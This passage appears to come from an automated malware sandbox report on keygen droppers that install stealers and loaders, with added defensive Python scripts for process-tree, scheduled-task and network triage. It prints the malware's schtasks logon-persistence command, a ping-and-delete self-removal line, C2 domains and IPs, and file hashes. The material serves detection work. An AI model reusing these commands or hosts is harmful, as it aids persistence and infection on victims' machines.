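The WriteProcessMemory rows above are the most useful part of this run for reconstruction: every row is a parent writing into a process it has just created, so the rows, de-duplicated, double as the process tree (keygen-step-4.exe fans out to Crack.exe, PBrowFile28.exe, md1_1eaf.exe, f2217e5f.exe, ss.exe and Setup.exe; PBrowFile28.exe in turn launches chrome3.exe, which goes through cmd.exe to schtasks.exe and then starts services64.exe). A write into a process that already existed would be injection rather than a child and should be reviewed separately. The script below is an added example for this report, not sandbox output or the malware's code; the helper names are mine, and ROWS is a constructed excerpt copied from the table above (including one of its duplicate rows).

```python
"""Rebuild a sandbox run's process tree from its 'Suspicious use of WriteProcessMemory' rows.

Added example for this report, not sandbox output or malware code. Helper names are mine.
ROWS is a constructed excerpt copied from the behavioral7 table; the full table parses the same way.
"""
import re
from collections import OrderedDict

ROWS = r"""
PID 1624 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1624 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2672 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1624 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 2772 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 2772 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3012 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2664 wrote to memory of 2632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3012 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 1624 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 2068 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe C:\Windows\SysWOW64\WerFault.exe
"""

# parent pid, child pid, indicator column (N/A here), parent image, child image.
# The two images are split at the last ' X:\' boundary, so paths with spaces survive
# unless a component itself looks like a drive root.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \S+ (.+?) ([A-Za-z]:\\.+)$")


def parse_rows(text):
    """De-duplicated (parent_pid, child_pid, parent_path, child_path) tuples in first-seen order."""
    seen = OrderedDict()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            key = (int(m.group(1)), int(m.group(2)))
            seen.setdefault(key, (key[0], key[1], m.group(3), m.group(4)))
    return list(seen.values())


def build_tree(edges):
    """Return (children, names): children maps pid -> [child pids]; names maps pid -> image path."""
    children, names = {}, {}
    for ppid, cpid, ppath, cpath in edges:
        names.setdefault(ppid, ppath)
        names.setdefault(cpid, cpath)
        children.setdefault(ppid, [])
        if cpid not in children[ppid]:
            children[ppid].append(cpid)
    return children, names


def roots(children):
    """PIDs that are parents but never children: the start of each launch chain."""
    all_children = {c for kids in children.values() for c in kids}
    return [p for p in children if p not in all_children]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def render(children, names, pid, depth=0):
    """Indented text tree: image basename followed by PID, children in first-seen order."""
    lines = ["  " * depth + basename(names[pid]) + " (" + str(pid) + ")"]
    for kid in children.get(pid, []):
        lines.extend(render(children, names, kid, depth + 1))
    return lines


def lineage(children, names, pid):
    """Basenames from the root down to pid, e.g. to answer 'what launched schtasks.exe?'."""
    parent = {c: p for p, kids in children.items() for c in kids}
    chain = [pid]
    while chain[0] in parent:
        chain.insert(0, parent[chain[0]])
    return [basename(names[p]) for p in chain]


if __name__ == "__main__":
    kids, imgs = build_tree(parse_rows(ROWS))
    for root in roots(kids):
        print("\n".join(render(kids, imgs, root)))
```

For triage, lineage() is the function to keep: a schtasks.exe whose chain starts in a Temp-directory binary, as here, is the thing to alert on, not schtasks.exe itself.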

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 136

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
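The persistence mechanism in this run is spelled out in the two schtasks lines above: a task named services64, created with /f (overwrite), /sc onlogon, /rl highest, whose action is an executable under the user's AppData\Roaming. That combination (elevated run level, logon trigger, user-writable action path) is what a detection should key on, independent of the task name. The checker below is an added example for this report, not sandbox output or the malware's code. It tokenizes the command line with the rules CommandLineToArgvW applies (double quotes group, single quotes are ordinary characters on Windows, which is why the /tr value keeps its outer single quotes and they have to be stripped afterwards), then grades the /create options. The two sample lines are copied from the Processes list above; BENIGN is a constructed control; the user-writable directory markers, the scoring and the helper names are my assumptions.

```python
"""Tokenize a Windows command line and grade a 'schtasks /create' for persistence risk.

Added example for this report, not sandbox output or malware code. SAMPLE_CMD and
SAMPLE_SCHTASKS are copied from this page's Processes list; BENIGN is a constructed control.
USER_WRITABLE, the scoring and the helper names are my assumptions.
"""

SAMPLE_CMD = r""""C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit"""
SAMPLE_SCHTASKS = r"""schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'"""
BENIGN = r"""schtasks /create /sc daily /tn "Nightly Backup" /tr "C:\Program Files\Backup\backup.exe" /st 02:00"""

SEPARATORS = ("&", "&&", "|", "||")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")  # assumption


def win_argv(cmdline):
    """Split like CommandLineToArgvW: double quotes group; backslashes are literal except in a
    run that precedes a quote (2n -> n backslashes, 2n+1 -> n backslashes plus a literal quote)."""
    args, cur, in_quotes, have, i = [], [], False, False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "\\":
            n = 0
            while i < len(cmdline) and cmdline[i] == "\\":
                n, i = n + 1, i + 1
            if i < len(cmdline) and cmdline[i] == '"':
                cur.append("\\" * (n // 2))
                if n % 2:                      # odd run: the quote is escaped, not a delimiter
                    cur.append('"')
                    i += 1
            else:
                cur.append("\\" * n)
            have = True
            continue
        if ch == '"':
            in_quotes = not in_quotes
            have = True
        elif ch in " \t" and not in_quotes:
            if have:
                args.append("".join(cur))
                cur, have = [], False
        else:
            cur.append(ch)
            have = True
        i += 1
    if have:
        args.append("".join(cur))
    return args


def schtasks_options(argv):
    """Map '/switch' -> value (True for bare switches) for the schtasks call inside argv,
    stopping at a cmd.exe separator so '... & exit' wrappers work. None if schtasks is absent."""
    start = next((i for i, a in enumerate(argv)
                  if a.lower().rsplit("\\", 1)[-1] in ("schtasks", "schtasks.exe")), None)
    if start is None:
        return None
    opts, toks, i = {}, argv[start + 1:], 0
    while i < len(toks):
        tok = toks[i]
        if tok in SEPARATORS:
            break
        if tok.startswith("/"):
            nxt = toks[i + 1] if i + 1 < len(toks) else None
            if nxt is not None and not nxt.startswith("/") and nxt not in SEPARATORS:
                opts[tok.lower()], i = nxt, i + 2
                continue
            opts[tok.lower()] = True
        i += 1
    return opts


def assess(cmdline):
    """Task name, action path, findings and verdict for a 'schtasks /create' command line."""
    opts = schtasks_options(win_argv(cmdline))
    if not opts or "/create" not in opts:
        return None
    action = str(opts.get("/tr", "")).strip("'\"")   # drop the '"..."' wrapping seen on this page
    writable = any(marker in action.lower() for marker in USER_WRITABLE)
    findings = []
    if writable:
        findings.append("action in user-writable directory")
    if str(opts.get("/rl", "")).lower() == "highest":
        findings.append("highest run level")
    if str(opts.get("/sc", "")).lower() in ("onlogon", "onstart"):
        findings.append("logon/boot trigger")
    if "/f" in opts:
        findings.append("force-overwrite")
    return {"task": str(opts.get("/tn", "")).strip("'\""), "action": action,
            "findings": findings, "suspicious": writable and len(findings) > 1}
```

The verdict requires the user-writable path plus at least one of the other signals, so a legitimate updater task under Program Files with /rl highest is not flagged, while the services64 task above trips all four checks whether it is seen through the cmd.exe wrapper or as the bare schtasks.exe process.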

Network

Country Destination Domain Proto
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 186.2.171.3:80 186.2.171.3 tcp
RU 186.2.171.3:443 186.2.171.3 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 remotenetwork.xyz udp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 best-supply-link.xyz udp
US 8.8.8.8:53 2no.co udp
US 172.67.149.76:443 2no.co tcp
US 172.67.149.76:443 2no.co tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 172.67.149.76:443 2no.co tcp
SG 37.0.10.214:80 tcp
UA 194.145.227.161:80 tcp
SG 37.0.10.244:80 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
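The Network tables in behavioral6 and behavioral7 above mix three different things in one column layout: UDP queries to 8.8.8.8:53 for real names, UDP queries for in-addr.arpa names (reverse lookups of public addresses, including the resolver's own 8.8.8.8), and TCP connections, some to named hosts and some to bare addresses with no name column at all (194.145.227.161:80 repeatedly, 37.0.10.214:80, 37.0.10.244:80, 31.210.20.251:80), which is the pattern of hosts hardcoded in the sample rather than resolved. The parser below is an added example for this report, not sandbox output or the malware's code. It separates those classes, turns the in-addr.arpa names back into the addresses being looked up, counts connections per endpoint, and matches names against the services the page's own "Legitimate hosting services abused" and "Looks up external IP address" signatures call out. ROWS is a constructed excerpt copied from the two tables; LEGIT_HOSTING and IP_LOOKUP are my lists, seeded from those signatures, and the helper names are mine.

```python
"""Parse sandbox Network tables and separate DNS, reverse lookups and raw TCP endpoints.

Added example for this report, not sandbox output or malware code. ROWS is a constructed
excerpt copied from the behavioral6 and behavioral7 Network tables on this page. Helper names
are mine; LEGIT_HOSTING and IP_LOOKUP are my lists, seeded from the page's signatures.
"""
import ipaddress
import re
from collections import Counter

ROWS = """
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 186.2.171.3:80 186.2.171.3 tcp
RU 186.2.171.3:443 186.2.171.3 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 2no.co udp
US 172.67.149.76:443 2no.co tcp
US 172.67.149.76:443 2no.co tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
UA 194.145.227.161:80 tcp
"""

# country, ip:port, optional name, protocol; the name column is absent for bare-IP connections
ROW_RE = re.compile(r"^([A-Z]{2})\s+(\S+:\d+)\s+(?:(\S+)\s+)?(tcp|udp)$")
LEGIT_HOSTING = {"pastebin.com", "raw.githubusercontent.com", "github.com"}  # assumption
IP_LOOKUP = {"ip-api.com"}                                                    # assumption


def parse_network(text):
    """One dict per table row; the header line and blank lines do not match and are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append({"cc": m.group(1), "dest": m.group(2), "name": m.group(3), "proto": m.group(4)})
    return rows


def ptr_target(name):
    """'172.214.232.199.in-addr.arpa' -> '199.232.214.172'; None for anything that is not a PTR name."""
    if not name or not name.lower().endswith(".in-addr.arpa"):
        return None
    octets = name[: -len(".in-addr.arpa")].split(".")
    if len(octets) != 4:
        return None
    ip = ".".join(reversed(octets))
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return None
    return ip


def summarize(rows):
    """Split rows into reverse lookups, forward names, TCP endpoints with hit counts, and
    TCP endpoints the sample reached without ever resolving a name for them."""
    ptr, names, tcp, direct = set(), set(), Counter(), set()
    for r in rows:
        if r["proto"] == "udp" and r["dest"].endswith(":53"):
            ip = ptr_target(r["name"])
            if ip:
                ptr.add(ip)
            elif r["name"]:
                names.add(r["name"].lower())
        elif r["proto"] == "tcp":
            tcp[r["dest"]] += 1
            host = r["dest"].rsplit(":", 1)[0]
            if r["name"] in (None, host):       # no name, or the name is just the IP again
                direct.add(r["dest"])
    return {
        "ptr_lookups": sorted(ptr),
        "dns_names": sorted(names),
        "tcp_endpoints": dict(tcp),
        "direct_ip_endpoints": sorted(direct),
        "hosting_abuse": sorted(names & LEGIT_HOSTING),
        "ip_lookup_services": sorted(names & IP_LOOKUP),
    }
```

direct_ip_endpoints is the list to feed into blocking or hunting first: those addresses never appear in a DNS answer, so a resolver-based control would not have seen them, and the repeated hits on 194.145.227.161:80 in the full table read as polling a fixed download or C2 host.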

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/2772-45-0x0000000000E70000-0x0000000001046000-memory.dmp

\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/3012-69-0x000000013FDE0000-0x000000013FDF0000-memory.dmp

memory/2484-70-0x00000000009A0000-0x00000000009A8000-memory.dmp

\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

memory/1508-71-0x0000000000240000-0x0000000000260000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/1624-97-0x0000000003F30000-0x0000000004197000-memory.dmp

memory/1624-96-0x0000000003F30000-0x0000000004197000-memory.dmp

memory/1512-99-0x0000000000400000-0x0000000000667000-memory.dmp

memory/1508-100-0x00000000002F0000-0x000000000030A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA11.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1512-120-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2876-119-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/1512-124-0x0000000000400000-0x0000000000667000-memory.dmp

memory/3012-125-0x0000000000560000-0x000000000056E000-memory.dmp

memory/2968-132-0x000000013F180000-0x000000013F190000-memory.dmp

memory/1512-134-0x0000000000400000-0x0000000000667000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/2068-153-0x0000000000400000-0x0000000002B4E000-memory.dmp

memory/1712-167-0x0000000000160000-0x000000000017E000-memory.dmp

memory/1712-168-0x00000000001F0000-0x000000000020A000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/2428-193-0x000000013FB20000-0x000000013FB26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarE54.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2296 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2296 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2296 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3164 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3164 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 163.109.116.89.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp

Files

memory/2296-0-0x0000000000EC0000-0x0000000000ED8000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20240903-en

Max time kernel

62s

Max time network

149s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

Pony family

pony

Pony,Fareit

rat spyware stealer pony

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
